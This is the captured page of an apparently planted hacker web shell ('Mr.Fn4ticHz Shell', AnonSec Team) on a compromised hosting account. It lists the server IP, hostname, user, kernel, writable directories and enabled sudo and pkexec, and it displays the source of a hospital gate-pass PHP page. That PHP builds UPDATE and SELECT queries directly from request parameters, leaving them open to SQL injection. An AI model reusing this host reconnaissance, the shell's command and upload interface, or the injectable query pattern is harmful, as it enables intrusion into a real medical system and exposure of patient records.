Mr.Fn4ticHz Shell
Server IP : 162.240.98.243  /  Your IP : 18.227.72.15
Web Server : Apache
System : Linux server.bti.yaw.mybluehostin.me 3.10.0-1160.119.1.el7.x86_64 #1 SMP Tue Jun 4 14:43:51 UTC 2024 x86_64
User : btiyawmy ( 1003)
PHP Version : 7.2.34
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /home/btiyawmy/public_html/login.easenup.in/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ HOME ]     

Current File : /home/btiyawmy/public_html/login.easenup.in//edit_showpage_Create_Gate_pass.php
<?php session_start();
require_once('../DBManager.php');
require_once('../LoginManager.php');
include 'header.php';
include 'dashboarddocument.php';
//Code for Registration 
if(isset($_POST['signup'])) 
{ 
$sql ="UPDATE Gatepass SET Checklist_Filed='$_POST[Checklist_Filed]',Ambulance_Required='$_POST[Ambulance_Required]',Discharge_Handover='$_POST[Discharge_Handover]',Time_Exit='$_POST[Time_Exit]'  WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";

if($qsql = mysqli_query($con,$sql))
	{
    echo "<script>alert('Update successfully');</script><script>window.history.go(-2)</script>;</script>";
  } 
  else {
    echo "Sorry, there was an error uploading your file.";
  } 
   
  
}

?>

    <style>
.switch {
  position: relative;
  display: inline-block;
  width: 90px;
  height: 34px;
}

.switch input {display:none;}

.slider {
  position: absolute;
  cursor: pointer;
  top: 0;
  left: 0;
  right: 0;
  bottom: 0;
  background-color: #ca2222;
  -webkit-transition: .4s;
  transition: .4s;
   border-radius: 34px;
}

.slider:before {
  position: absolute;
  content: "";
  height: 26px;
  width: 26px;
  left: 4px;
  bottom: 4px;
  background-color: white;
  -webkit-transition: .4s;
  transition: .4s;
  border-radius: 50%;
}

input:checked + .slider {
  background-color: #2ab934;
}

input:focus + .slider {
  box-shadow: 0 0 1px #2196F3;
}

input:checked + .slider:before {
  -webkit-transform: translateX(26px);
  -ms-transform: translateX(26px);
  transform: translateX(55px);
}

/*------ ADDED CSS ---------*/
.slider:after
{
 content:'No';
 color: white;
 display: block;
 position: absolute;
 transform: translate(-50%,-50%);
 top: 50%;
 left: 50%;
 font-size: 10px;
 font-family: Verdana, sans-serif;
}

input:checked + .slider:after
{  
  content:'Yes';
}



.center {
   border: 1px solid grey;
   text-align:;
}

</style>
<style>
    
.center {
   border: 1px solid grey;
   text-align:;
}

</style>
<div class="content-wrapper">
    <!-- Content Header (Page header) -->
    <section class="content-header">


    <form name='signup' method='POST'>
        <div class='center'>
<table id='example2' class='table table-bordered table-hover'>

<?php 
		$sql ="SELECT * FROM Gatepass WHERE prescriptionid='$_GET[prescriptionid]' AND patientid='$_GET[patientid]'";
		$qsql = mysqli_query($con,$sql);
		if($rs = mysqli_fetch_array($qsql))
		{
		  if($rs[Checklist_Filed]=='on')
		  {
echo"
<div class='center'>
      <table id='example2' class='table table-bordered table-hover'>
          <tr><td><span style='font-size: 20px'>Discharge Checklist Filed </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Checklist_Filed' checked>
  <span class='slider'></span>
</label>
</td>
</tr>";
}
else
{
  echo"
<div class='center'>
      <table id='example2' class='table table-bordered table-hover'>
          <tr><td><span style='font-size: 20px'>Discharge Checklist Filed </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Checklist_Filed'>
  <span class='slider'></span>
</label>
</td>
</tr>";  
}
	  if($rs[Ambulance_Required]=='on')
		  {
echo"
<tr><td><span style='font-size: 20px'>Ambulance Required and Booked </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Ambulance_Required' checked>
  <span class='slider'></span>
</label>
</td>
</tr> 
";
}
else{
echo"
<tr><td><span style='font-size: 20px'>Ambulance Required and Booked </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Ambulance_Required'>
  <span class='slider'></span>
</label>
</td>
</tr> 
";
}
 if($rs[Discharge_Handover]=='on')
		  {
echo"
<tr><td><span style='font-size: 20px'>Discharge Handover with NOC </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Discharge_Handover' checked>
  <span class='slider'></span>
</label>
</td>
</tr> 
";
}
else{
echo"
<tr><td><span style='font-size: 20px'>Discharge Handover with NOC </span></h3></td><td><label class='switch'>
  <input type='checkbox' name='Discharge_Handover'>
  <span class='slider'></span>
</label>
</td>
</tr> 
";
}
echo"

        <tr><td><span style='font-size: 20px'>Time of Exit</span></h3></td><td>
  <input type='time' value='$rs[Time_Exit]' name='Time_Exit'>
 
</td>
</tr> 
";
}
?>
</table>

<input type='submit' name='signup' value='Update'>
</div>
</form>

Anon7 - 2022
AnonSec Team